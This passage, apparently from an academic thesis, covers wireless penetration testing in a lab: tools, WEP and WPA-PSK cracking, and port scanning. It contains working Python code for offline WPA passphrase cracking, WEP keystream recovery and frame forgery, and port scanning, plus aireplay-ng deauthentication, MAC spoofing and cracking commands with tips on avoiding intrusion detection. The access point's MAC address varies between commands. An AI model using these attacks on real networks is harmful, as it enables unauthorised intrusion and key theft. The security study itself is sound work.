stem from the intrinsic nature of radio frequency (RF) communications and the
complexity of the physical medium and of the 802.11 specifications [Arbaugh 2003].
Standard wireless equipment contains only a single radio; therefore, it is only capable of
listening to one channel at a given moment.
Although some tools use a technique called channel hopping to scan the whole
frequency spectrum and sample all the different channels, such tools can only listen for a
few milliseconds on each channel, so frames sent on other channels in the meantime are
missed. As mentioned before, the Intel PRO/Wireless 3945 802.11a/b/g wireless card is
the card used in this project. Table 2.1 below shows the specifications and features of
this wireless card [VAC 2008].
Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications
Main Specifications
  Product Description: Intel PRO/Wireless 3945ABG Network Connection - network adapter
  Device Type: Network adapter
  Form Factor: Plug-in card
  Interface (Bus) Type: Mini-PCI Express
  Data Link Protocol: IEEE 802.11b, IEEE 802.11a, IEEE 802.11g
  Compliant Standards: IEEE 802.11b, IEEE 802.11a, IEEE 802.11g, IEEE 802.1x, Wi-Fi CERTIFIED
Networking
  Spread Spectrum Method: OFDM
  Data Transfer Rate: 54 Mbps
  Line Coding Format: DBPSK, DQPSK, CCK, 64 QAM, BPSK, QPSK, 16 QAM
Miscellaneous
  Encryption Algorithm: LEAP, MD5, AES, 128-bit WEP, 64-bit WEP, TLS, PEAP, TTLS, TKIP, WPA, WPA2
  Compliant Standards: UL, cUL, IEC 60950, CB
The Intel PRO/Wireless 3945ABG card can monitor every channel of both the
2.4 GHz and the 5 GHz bands, although, having a single radio, it does so by hopping
between channels rather than by listening to several at once. Out of the box, however, it
lacks the capability to inject packets, which the packet injection attacks require. To
overcome this technical handicap, special drivers were installed. Another key component
is the wireless access point used during the penetration test. The model chosen was the
Linksys WAP54G; Table 2.2 describes its main specifications.
Table 2.2 Access Point Specifications
  Model Number: WAP54G
  Standards: IEEE 802.11g, IEEE 802.11b, IEEE 802.3, IEEE 802.3u
  Ports/Buttons: One 10/100 auto-crossover port, power port, reset and SES button
  Cabling Type: RJ-45
  Security Features: WPA, Linksys Wireless Guard, WEP encryption, MAC filtering, SSID broadcast enable/disable
  WEP Key Bits: 64/128-bit
This wireless access point supports data rates up to 54 Mbps and is also
compatible with existing 802.11b devices. The WAP54G supports WPA security and
64/128-bit WEP encryption, as well as wireless bridging, wireless repeating, MAC
filtering and event logging. With the wireless card and the access point described, the
next step is to define the software tools that were used [VAC 2008].
2.3.2 Software Description
All the tools used in this project are open source tools, most of them available on
the Backtrack 3.0 Live CD and the rest downloaded from their own web sites. Backtrack
is the top-rated Linux live distribution focused on penetration testing. With no
installation whatsoever, the analysis platform is started directly from the CD-ROM and
is fully usable within minutes. Backtrack has a long history and was based on several
different Linux distributions before finally settling on a Slackware base.
Every package, kernel configuration and script is optimized for use by penetration
testers, and patches and automation have been added, applied or developed to provide a
neat, ready-to-go environment. Figure 2.3 shows the Backtrack 3.0 desktop.
Figure 2.3 Backtrack 3.0 Desktop
Backtrack 3.0 is the latest version. It supports more and newer hardware and
provides more flexibility and modularity. It also contains more than 300 different
up-to-date tools, logically structured according to the workflow of security
professionals. Furthermore, Backtrack 3.0 is aligned with penetration testing
methodologies and assessment frameworks (ISSAF and OSSTMM), which is helpful
during daily reporting tasks.
The first tool used is NetStumbler. It is free, easy to install and simple to use.
NetStumbler is a tool for Windows that allows the pen-tester to detect Wireless Local
Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It also provides radio
frequency (RF) signal information and other data relevant to combining computers and
radios. NetStumbler sends out a probe request about once a second and reports the
responses, with information such as the Service Set Identifier (SSID) and the Media
Access Control (MAC) address. This is known as active scanning. Figure 2.4 displays the
main screen of NetStumbler [Bayles 2007].
Figure 2.4 NetStumbler Main Screen
One of the weaknesses of NetStumbler is its inability to detect wireless LANs
with hidden SSIDs. However, it does include a very useful graphical representation of
signal strength (in green) and noise (in red) over time, which is useful for
direction-finding wireless LANs (Figure 2.5). Also, with a GPS device NetStumbler can
create a file in the .ns1 format which can be imported into Microsoft's MapPoint software
to produce a map of any wardriving session or site survey [Bayles 2007].
Figure 2.5 Graphical representation of Signal Strength
To find the wireless access points that were not broadcasting their SSID, the
Kismet tool was used. Kismet is an 802.11 layer 2 wireless network detector, sniffer and
intrusion detection system which comes with the Backtrack 3.0 Live CD. Kismet works
with any wireless card that supports raw monitoring (rfmon) mode and can sniff 802.11b,
802.11a and 802.11g traffic [Hurley 2007].
It identifies networks by passively collecting packets, detecting standard named
networks and hidden networks, and inferring the presence of non-beaconing networks
from data traffic. Kismet also has a very powerful user interface that provides a large
amount of information about each access point identified. Figure 2.6 shows the Kismet
main interface [Hurley 2007].
Figure 2.6 The Kismet Interface
The network list can be sorted in 14 different ways using the sort options. Once a
sort method is chosen, additional information about each network can be displayed.
Networks shown in red are those whose access point is using factory default settings.
Networks in yellow have access points broadcasting without any encryption. Green
networks are secured with an encryption method. Blue networks are access points that
are not broadcasting their SSID [Hurley 2007].
As mentioned before, Kismet is a passive detector; however, it captures packets
from all the wireless access points in range. This is legally sensitive, because capturing
traffic from networks one is not authorized to test may itself be unlawful. NetStumbler
and Kismet were used in the project for wardriving and site surveying [Hurley 2007].
With the information collected from those two tools, the second step is to
attempt to crack the encryption used by the access point, if any. For this purpose the
Aircrack-ng 1.0 suite of tools, also part of the Backtrack 3.0 Live CD, was used.
Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover
keys once enough data packets have been captured. It implements the FMS attack with
optimizations such as the KoreK attacks, and the latest version also implements the PTW
attack, which makes WEP cracking much faster than with other tools [Hurley 2007].
Airodump-ng, part of the Aircrack-ng suite, is used for capturing raw 802.11
frames. It is particularly suited to collecting WEP initialization vectors (IVs) for later
use with Aircrack-ng. Airodump-ng can detect all nearby access points and can then be
set to listen to one specific access point on its channel. Furthermore, to minimize the disk
space used by the capture it can be set to store only the initialization vectors rather than
the full packets; however, to crack WPA or to use the PTW attack on WEP the full packets
are needed [Hurley 2007].
If the network is generating no traffic, the Aireplay-ng tool can be used to inject
frames. It implements several attacks. The first is the deauthentication attack, used to
capture WPA handshake data, reveal a hidden ESSID, or provoke ARP requests. This
attack sends deauthentication frames to one or more clients currently associated with a
particular access point. Since cracking WPA-PSK requires only the four-way (EAPOL)
handshake, forcing an associated client to reconnect lets the attacker collect these four
frames [Hurley 2007].
Once these frames are collected, the tool used to crack WPA-PSK was coWPAtty
by Joshua Wright, which automates the offline dictionary attack to which WPA-PSK
networks are vulnerable. coWPAtty derives the Pairwise Transient Key (PTK) for every
word or phrase in a dictionary and checks whether that PTK produces the correct Message
Integrity Check (MIC) value for a given handshake packet. From the four-way handshake
it first obtains the SSID of the network, which is needed as the salt in the hashing
algorithm (PBKDF2 with HMAC-SHA1, 4096 iterations) that turns the passphrase into
the Pairwise Master Key (PMK). To derive the PTK, the random nonces and the MAC
addresses exchanged in the four-way handshake are needed; once these are found they
are combined with the PMK to produce the PTK [Hurley 2007].
Finally this value is used to compute the MIC of a handshake packet. If the
calculated MIC matches the MIC in the packet, the correct passphrase has been found; if
not, the process is repeated with the next dictionary word or phrase. To speed up the
process by about three orders of magnitude a penetration tester can use precomputed hash
tables, which can be found on the Internet in both 7 GB and 34 GB varieties. The 7 GB
tables were created from a dictionary of 172,000 words and the 1,000 most common
SSIDs. If the SSID of the target network is not among those 1,000, the penetration tester
can generate a table using the genpmk tool included with coWPAtty. If the passphrase is
not in the dictionary the attack will fail. Furthermore, the attack is useless if there are no
associated wireless clients, since without a client there is no handshake to capture
[Hurley 2007].
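The derivation chain just described (passphrase to PMK, PMK to PTK, KCK to MIC) as an added, self-contained example; it is not coWPAtty's or aircrack-ng's code. The "captured" handshake is constructed by computing a station's message 2 for a known passphrase, and the AP and client MAC addresses, the nonces and the wordlist are made-up test values; PBKDF2 and HMAC come from the Python standard library.

```python
"""Offline dictionary attack on a WPA/WPA2-PSK four-way handshake.

Added example for this thesis, not coWPAtty's or aircrack-ng's code. The "captured"
handshake is constructed below by deriving the station's message 2 for a known
passphrase, so the script runs offline without a real capture.
"""
import hashlib
import hmac

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81; the 16-byte MIC field follows.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). The SSID is the salt,
    which is why a precomputed table (genpmk) is only valid for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-512 over min/max of the MACs and nonces; KCK is the first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]


def eapol_mic(kck, eapol_frame):
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for descriptor
    version 1 (WPA/TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (WPA2/CCMP)."""
    version = int.from_bytes(eapol_frame[5:7], "big") & 0x7
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist, pmk_table=None):
    """coWPAtty's loop: candidate -> PMK (or table lookup) -> PTK -> KCK -> MIC; stop on a match."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if pmk_table and candidate in pmk_table:
            pmk = pmk_table[candidate]          # the expensive PBKDF2 step was precomputed
        else:
            pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def genpmk(ssid, wordlist):
    """Precompute PMKs for one SSID, as coWPAtty's genpmk does."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def build_msg2(kck, snonce, descriptor_version):
    """Constructed station->AP EAPOL-Key message 2 (RSN descriptor, pairwise, MIC bit set)."""
    key_info = descriptor_version | (1 << 3) | (1 << 8)
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + (0).to_bytes(2, "big"))
    frame = bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def constructed_handshake(passphrase, ssid="testnetwork", descriptor_version=2):
    """Simulate a capture: fixed test MACs and nonces, message 2 computed for the passphrase."""
    ap_mac = bytes.fromhex("000f66df8745")      # the rogue AP's address from section 3.1
    sta_mac = bytes.fromhex("0013ce0a0b0c")     # constructed client address
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(kck, snonce, descriptor_version)


if __name__ == "__main__":
    hs = constructed_handshake("correct horse battery")
    wordlist = ["password", "12345678", "linksys", "correct horse battery"]
    print("recovered:", crack_psk(*hs, wordlist))
    table = genpmk("testnetwork", wordlist)      # amortised over every handshake seen on this SSID
    print("recovered via table:", crack_psk(*hs, wordlist, pmk_table=table))
```

In a real run the values returned by constructed_handshake() are replaced by the SSID, both MAC addresses, both nonces and the EAPOL frame of message 2 parsed out of the airodump-ng capture; everything else, including the fact that a genpmk table serves one SSID only, is unchanged.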
The second attack is fake authentication, which allows the penetration tester to
perform either type of WEP authentication (Open System or Shared Key) and associate
with the access point. This is useful when an associated MAC address is needed and there
is currently no associated client. If there are associated clients, the interactive packet
replay attack can be used instead. This attack lets the attacker choose a specific packet to
replay, taken either from a live flow of packets or from a .cap file. Not every captured
packet can be replayed: only certain packets are accepted by the access point and cause it
to generate a new initialization vector [Hurley 2007].
Nevertheless, with a tool such as packetforge-ng the penetration tester can
generate packets and store them in a .cap file. Since Aireplay-ng can read a packet
previously created with packetforge-ng from such a file, the penetration tester can
successfully inject packets even if no associated client is generating traffic. A better way
to generate new IVs is the ARP request replay attack. This attack needs an ARP packet:
the program listens for an ARP request and then retransmits it to the access point, which
in turn rebroadcasts the ARP packet with a new IV. The program then retransmits the
same ARP packet over and over, harvesting a new IV each time [Hurley 2007].
As mentioned before, packetforge-ng can generate any type of packet. However,
to do so it needs a stretch of keystream, referred to as the PRGA (after RC4's
pseudo-random generation algorithm). To recover the PRGA, Aireplay-ng needs to receive
at least one data packet from the access point. It then attempts to send ARP and/or LLC
packets with known content to the access point; if a packet is successfully echoed back by
the AP, a larger amount of keying information can be obtained from the returned packet.
This cycle is repeated several times until 1500 bytes of PRGA are obtained. Once the
PRGA is written to a file, packetforge-ng can generate valid packets [Hurley 2007]. Note
that the recovered keystream belongs to the IV of the frame it was taken from, since WEP
seeds RC4 with the IV and the key; a forged frame must therefore reuse that IV.
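To make the keystream recovery concrete, the following added example implements RC4 and the WEP framing itself (it is not aircrack-ng or packetforge-ng code): it recovers the keystream for one IV from a frame whose plaintext is known, then forges a different ARP request under the same IV without ever knowing the key. The key, the IV and the frame contents are constructed.

```python
"""WEP keystream (PRGA) recovery from a frame with known plaintext, and reuse of that
keystream to forge a valid frame without the key.

Added example for this thesis, not aircrack-ng or packetforge-ng code. RC4 and the WEP
framing are implemented here so it runs offline; key, IV and frames are constructed.
"""
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # known first 8 bytes of every ARP frame


def rc4_keystream(key, length):
    """Plain RC4: key scheduling, then the pseudo-random generation algorithm (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data))


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """Body = RC4(IV || key) XOR (plaintext || ICV); the 3-byte IV and key-id byte go in clear."""
    pt = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(pt, rc4_keystream(iv + key, len(pt)))


def wep_decrypt(key, frame):
    """Receiver side: regenerate the keystream from the clear IV, then check the ICV."""
    iv, body = frame[:3], frame[4:]
    pt = xor(body, rc4_keystream(iv + key, len(body)))
    data, tag = pt[:-4], pt[-4:]
    if tag != icv(data):
        raise ValueError("ICV mismatch: frame rejected")
    return data


def recover_prga(frame, known_plaintext, complete=True):
    """Ciphertext XOR known plaintext = keystream for this frame's IV. If the attacker sent
    the packet itself and saw the AP relay it, the whole plaintext (hence the ICV) is known;
    if only the LLC/SNAP header is known, just 8 bytes come out, which is why aireplay-ng
    repeats the cycle until it has 1500 bytes."""
    iv, body = frame[:3], frame[4:]
    known = known_plaintext + icv(known_plaintext) if complete else known_plaintext
    return iv, xor(body[:len(known)], known)


def forge_frame(iv, prga, plaintext):
    """packetforge-ng's job: any plaintext no longer than the keystream, valid ICV, same IV."""
    pt = plaintext + icv(plaintext)
    if len(pt) > len(prga):
        raise ValueError("need %d keystream bytes, have %d" % (len(pt), len(prga)))
    return iv + b"\x00" + xor(pt, prga)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")                 # constructed 40-bit key, unknown to the attacker
    iv = bytes.fromhex("0c0d0e")
    arp_req = LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)   # constructed ARP request
    relayed = wep_encrypt(key, iv, arp_req)           # what the AP sends back
    iv, prga = recover_prga(relayed, arp_req)         # attacker knows arp_req: it sent it
    forged = forge_frame(iv, prga, LLC_SNAP_ARP + bytes.fromhex("0001080006040002") + bytes(20))
    print("AP accepts forged frame:", wep_decrypt(key, forged) is not None)
```

The two failure modes the text hints at both show up here: with only the LLC/SNAP header known, the keystream is too short to forge anything but a trivial frame, and a keystream recovered under one IV does not decrypt (or forge) frames sent under another.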
Once the pen-tester has access to the wireless network, the next step is to identify
the specific services and resources that a target offers. The enumeration process
encompasses port scanning, service identification and fingerprinting. Although there are
many different port scanners, they all operate in much the same way. The most common
type of scan uses the TCP SYN flag, which appears in the TCP connection sequence, or
handshake [Hassell 2004].
This type of scan begins by sending a SYN packet to a destination port. The
target receives the SYN packet and responds with a SYN/ACK if the port is open or an
RST if the port is closed. Because the scanner never completes the TCP handshake, the
service on the target does not see a full connection and usually does not log it. The most
common enumeration tools include Nmap, Amap and LanGuard [Hassell 2004].
Other types of port scan use various TCP flag combinations, such as FIN, PUSH
and URG. Different systems respond differently to these packets, so there is an element
of OS detection when using these flags; however, their main purpose is to bypass access
controls that specifically key on connections initiated with particular TCP flags set.
Table 2.3 summarizes the common Nmap options along with the scan types they initiate
and the expected responses [Hassell 2004].
Table 2.3 Nmap Options and Scan Types [Beaver 2005]
Nmap Switch | Type of Packet Sent | Response if Open | Response if Closed | Description
-sT | OS-based connect() | Connection made | Connection refused or timeout | Basic nonprivileged scan type
-sS | TCP SYN packet | SYN/ACK | RST | Default scan type with root privileges
-sN | TCP packet with no flags | Connection timeout | RST | Designed to bypass nonstateful firewalls
-sV | Subprotocol-specific probe | N/A | N/A | Used to determine the service running on an open port; uses the service database
-O | Both TCP and UDP packet probes | N/A | N/A | Uses multiple methods to determine target OS/firmware version
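As an added example (not Nmap's code) of the -sT behaviour in Table 2.3, the following connect() scanner classifies a port as open, closed or filtered from the result of connect() and grabs the service banner as a crude -sV. It starts a constructed listener on 127.0.0.1 so that it has an open port to find offline; the banner text is made up.

```python
"""TCP connect() port scan with banner grabbing: what Nmap's -sT does, plus a crude -sV.

Added example for this thesis, not Nmap's code. It starts a throw-away listener on
127.0.0.1 so there is an open port to find offline; the banner is constructed.
"""
import errno
import socket
import threading


def start_fake_service(banner=b"SSH-2.0-OpenSSH_4.7p1\r\n"):
    """Constructed target: listens on an ephemeral port and greets each client with a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port():
    """Find a port nothing listens on, to have a 'closed' case to scan."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def scan_port(host, port, timeout=1.0, grab_banner=True):
    """connect() completes the three-way handshake, so unlike -sS the target sees (and may
    log) a full connection. Returns (state, banner) with state open, closed or filtered."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        rc = s.connect_ex((host, port))
        if rc == 0:                                   # SYN/ACK arrived: port is open
            banner = b""
            if grab_banner:
                try:
                    banner = s.recv(256)
                except (socket.timeout, OSError):
                    pass
            return "open", banner.strip().decode("ascii", "replace")
        if rc == errno.ECONNREFUSED:                  # RST arrived: port is closed
            return "closed", ""
        return "filtered", ""                         # no usable answer: a firewall dropped the SYN
    except socket.timeout:
        return "filtered", ""
    finally:
        s.close()


def scan(host, ports, timeout=1.0):
    """Scan a list of ports; the caller decides whether to hide closed ones as nmap does."""
    return {port: scan_port(host, port, timeout) for port in ports}


if __name__ == "__main__":
    listener, open_port = start_fake_service()
    for port, (state, banner) in scan("127.0.0.1", [open_port, unused_port()]).items():
        print(port, state, banner)
    listener.close()
```

The "filtered" branch is what the "Connection refused or timeout" cell of the table hides: a refused connection is an RST from a live host, while a timeout means something between the scanner and the host silently dropped the SYN.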
3. SYSTEM RESEARCH
Two pen-test labs were created for the purpose of deploying a penetration testing
methodology: the first is an external pen-test lab and the second an internal pen-test lab.
3.1 External Pen-test Lab
In an external pen-test lab the goal is to determine whether it is possible to
penetrate the network without having the permissions to do so [Beaver 2005]. As
mentioned before, in this type of lab the defense in depth principle is followed. The
layout of the network is shown in Figure 3.1.
Figure 3.1 External Pen-test Lab
The first scenario was designed to be the most insecure of all: the access point was
set up with no security at all. "There have been many reported cases where companies
have been attacked through a wireless access point installed without the consent of the
security manager" [Beaver 2005].
The access point attacked was unencrypted and the SSID of the network was
visible. To find out whether an employee had set up a wireless access point, the tool used
was NetStumbler. Figure 3.2 shows all the access points broadcasting their SSID.
Figure 3.2 Access Point Broadcasting
There were 14 active access points broadcasting within range of the pen-tester's
machine. The information gathered from NetStumbler shows an unauthorized "rogue"
access point with the SSID "testnetwork", MAC address 00:0F:66:DF:87:45, operating
on channel 6, with Linksys as the vendor. Furthermore, its speed is 11 Mbps and it has no
security in place. For an attacker this is the best possible scenario: there is nothing to do
besides connecting to the rogue access point, and in one step he is on the wired network,
bypassing all the security in place. All the perimeter security measures such as firewalls,
IDS and routers are useless, because the rogue access point serves as an entry door
behind them.
A security measure could be to disable SSID broadcasting. In this case the
employee does not want to be caught by the security manager, and the pen-tester should
be aware of this possibility. Figure 3.3 shows the output of NetStumbler with the wireless
access point not broadcasting its SSID [Bayles 2007].
Figure 3.3 Output of Netstumbler
NetStumbler was not able to find the wireless access point with the SSID
"testnetwork" when the AP was not broadcasting its SSID. The reason is that
NetStumbler transmits a broadcast probe request to discover WLANs. Most access points
respond to a broadcast probe request by default; however, if the access point is
configured not to respond, NetStumbler can no longer detect it. It would be wrong to rely
on only one tool; a rule of thumb is to try at least two different tools.
The second tool selected is Kismet, a Linux-based tool included in the Backtrack
3.0 Live CD. Figure 3.4 shows all the networks in range of the pen-tester as seen by
Kismet.
Figure 3.4 Access Point Broadcasting
By default Kismet is in autofit sort mode. Unfortunately, in this mode the
penetration tester cannot obtain much information about the different access points
beyond what is displayed in the default view. To change the sort mode, press the s key to
bring up a menu of the sort options. Since the goal is to identify the networks that are not
broadcasting their SSID, the penetration tester can sort by SSID by choosing the s
option.
Once the networks are sorted, there are two wireless access points (APs) that are not
broadcasting their SSID. To get additional information about those two networks, use the
arrow keys to highlight the access point with no SSID and press Enter to open the
Network Details view (Figure 3.5).
Figure 3.5 Network Details
In the network details, the penetration tester finds the MAC address (Basic Service Set
Identifier [BSSID]) of the wireless access point. Since the max rate is 11.00 Mbps, the
penetration tester can determine that it is an 802.11b access point operating in
infrastructure mode. Information about the manufacturer, which in this case is Linksys,
is also displayed. Furthermore, although the main screen has an indicator of whether the
network is encrypted or not, that indicator does not identify the type of encryption.
In the network details, however, the penetration tester can see the type of encryption in
place, which in this case is none. Once all this information has been recorded, press the q
key to return to the main screen. Another feature of Kismet is that it allows the pen-tester
to determine who is actually connected to a network. By highlighting the access point and
pressing the c key, the penetration tester is presented with a list of the clients associated
with the network. In the client view, the penetration tester can determine the MAC address
of every client associated with the access point. Additionally, in some cases, the type of
card is displayed. The number of data packets that Kismet has seen and the number of
those packets that are encrypted are also shown. Once Kismet determines the Internet
Protocol (IP) address of a specific client it is noted, as is the signal strength [Bayles 2007].
This information is important for identifying the people who, in most cases, are breaking
a rule by setting up a rogue access point. With the MAC address a pen-tester can review
the company's hardware list. Since the MAC address of each wireless card is unique, the
computer containing that wireless card can be determined, and from the computer the
pen-tester can accurately find the name of the employee who is using the rogue access
point. Once the pen-tester has determined the existence of the rogue access point, and
since the AP has no security enabled, the pen-tester now has access to the wired network.
Indeed, all the security measures are useless with the rogue access point in place.
3.1.1 Cracking WEP
The second scenario was an access point with the WEP encryption method enabled. The
purpose of this scenario was to test the WEP cracking tools. As mentioned before, the
tools used to crack WEP were the Aircrack-ng suite and WEPcrack. Before proceeding
any further it was important to verify that the computer used was able to capture traffic.
For this, the wireless card has to be configured with the correct drivers. To test whether
the wireless card is configured correctly, the Airmon-ng script was used. Airmon-ng places
the interface in monitor mode; if the interface cannot be started in monitor mode, there
are problems with the wireless card's drivers. One of the disadvantages of running
Backtrack from a live CD is not being able to write to the CD, so every time Backtrack is
loaded the pen-tester needs to install the correct drivers again. Once the interface is in
monitor mode the penetration tester can start capturing packets.
Although any packet analyzer capable of writing the cap format can be used, the
Airodump-ng tool was used because it is included in the Aircrack-ng suite. By default,
Airodump-ng hops across all channels; however, there is an option to lock onto a specific
channel if desired. The command used to start Airodump-ng was:
airodump-ng --channel 6 --write test -b 00:16:B6:6C:CD:92 wifi0
• --channel specifies the channel to lock onto. The access point was working on
channel 6.
• --write writes the captured packets to a file, in this case with the prefix test
(producing test-01.cap).
• -b is the BSSID of the access point.
• wifi0 is the interface used.
Airodump-ng shows the number of packets and IVs that have been collected, as well as
all the stations connected to the access point, as shown in Figure 3.6.
Figure 3.6 Airodump-ng Captures Packets
After using Airodump-ng to determine an allowed MAC address, which in this case was
00:18:E7:1D:EF:CD, it was necessary to change the MAC address of the test machine:
although MAC address filtering is an ineffective security mechanism, it is still used, so
penetration testers need to be able to spoof MAC addresses. Backtrack provides a tool to
accomplish this, called macchanger. The command line used to change the MAC address:
macchanger -m 00:18:E7:1D:EF:CD wifi0
• -m sets a manual MAC address.
• 00:18:E7:1D:EF:CD is the MAC address of the station that is allowed to connect.
• wifi0 is the interface whose MAC address is going to be changed.
Once the MAC address was successfully changed, the next step was to generate enough
packets to crack WEP. Since only one station was connected to the access point, it would
have taken too long for that station to generate the packets needed on its own. The tool
used to inject packets was Aireplay-ng, which is also included in the Aircrack-ng suite.
Aireplay-ng offers several types of attacks that can be used to inject packets. The two
most common are the ARP request replay attack and the packet replay attack, and both
were used. The first attack needs to capture an ARP packet, which it then replays. The
command line used:
aireplay-ng -3 -e testnetwork -b 00:12:17:9E:85:C7 -h 00:18:E7:1D:EF:CD wifi0
• -3 selects the ARP request replay attack.
• -e is the ESSID of the access point.
• -b is the MAC address of the access point.
• -h is the MAC address of the source wireless interface.
• wifi0 is the interface.
The attack starts reading packets and capturing ARP request packets, as shown in
Figure 3.7. It replays these packets back to the access point, and the access point
generates a response for each packet received. Each packet generated by the access point
carries a different IV.
Figure 3.7 Aireplay-ng starting to inject packets
The number of packets started to increase dramatically once the attack was in progress.
The number of packets sent by the station with MAC address 00:18:E7:1D:EF:CD
increased. The penetration tester can verify this by returning to the Airodump-ng window:
the #Data column was rising quickly, and the #/s column showed the rate of injection.
The other way to generate traffic is by injecting normal packets instead of ARP packets.
The reason for using this attack is to avoid a wireless intrusion detection system that
could be monitoring the wireless network. The command line used:
aireplay-ng -2 -b 00:21:29:CA:BA:62 -d FF:FF:FF:FF:FF:FF wifi0
• -2 selects the packet replay attack.
• -b is the MAC address of the access point.
• -d sets the destination MAC; the broadcast address reaches all stations on the network.
• wifi0 is the interface.
Figure 3.8 The packet replay attack
As with the ARP request replay attack, the number of packets started to increase
dramatically. The final step was to open one last window and run Aircrack-ng:
aircrack-ng -b 00:12:17:9E:85:C7 test-01.cap
• -b selects the target AP.
• test-01.cap is the capture file produced from the prefix specified when starting
Airodump-ng.
In Aircrack-ng version 1.0 the default attack used to crack WEP is the PTW attack, which
recovers the key faster than previous attacks. Regardless of the method by which WEP is
cracked, once found, the key is displayed in hex format (Figure 3.9). In this case the key
was found with 9978 IVs. With the key the pen-tester can connect to the wireless network
and then to the wired network.
Figure 3.9 Aircrack-ng displaying the Key
3.1.2 Cracking WPA-PSK
The third scenario was a wireless network encrypted with the WPA-PSK encryption
method. The passphrase used was eight characters long without any special symbols. In
this case, the techniques considered were WPA dictionary attacks and brute force attacks.
The tools used to crack WPA were coWPAtty and Aircrack-ng 1.0, both of which are
included with the Backtrack Live CD.
The first step was to capture the four-way EAPOL handshake using Airodump-ng, since
it was already running. To obtain these four packets a deauthentication attack was
performed using aireplay-ng. The command used:
aireplay-ng -0 1 -a 00:12:17:9E:85:C7 -c 00:18:E7:1D:EF:CD wifi0
• -0 specifies the deauthentication attack.
• 1 is the number of deauthentication packets to send; 0 means continuous.
• -a is the MAC address of the access point.
• -c is the MAC address of the client to deauthenticate; if omitted, all clients are
deauthenticated.
• wifi0 is the interface.
A deauthentication attack will probably alert any wireless intrusion detection system
(IDS). If the idea is not to be detected, the penetration tester will have to wait until the
EAPOL handshake occurs naturally. Upon reauthentication, the four-way handshake is
transmitted and captured with Airodump-ng. With the handshake capture collected by
Airodump-ng and the wordlist (or a precomputed table generated for the SSID of the
wireless access point), the next step was to start coWPAtty. The command used:
cowpatty -f password.txt -r wpa-01.cap -s testnetwork
• -f is the wordlist.
• -r is the capture file containing the four-way handshake.
• -s is the SSID of the access point.
In this case the passphrase was in the dictionary file, so coWPAtty was able to process
the capture and find the key in a short period of time. Figure 3.10 shows the search in
progress.
Figure 3.10 The process of searching
It is important to mention that although cracking WPA/WPA2-PSK may seem easier than
cracking WEP, attacks on WPA/WPA2-PSK rely on brute force and dictionary attacks,
which are often computationally infeasible. With an appropriate passphrase length these
two methods become far less effective. For example, with an eight-character passphrase
drawn from only 62 characters (alphanumeric characters), the total key space, and thus
the dictionary needed to cover every eight-character password, exceeds 218 trillion
entries, which is far beyond any current storage capability. Furthermore, coWPAtty can
only try 30-60 words per second; with 218 trillion possibilities it could take years to try
all of them.
3.2 Internal pen-test lab
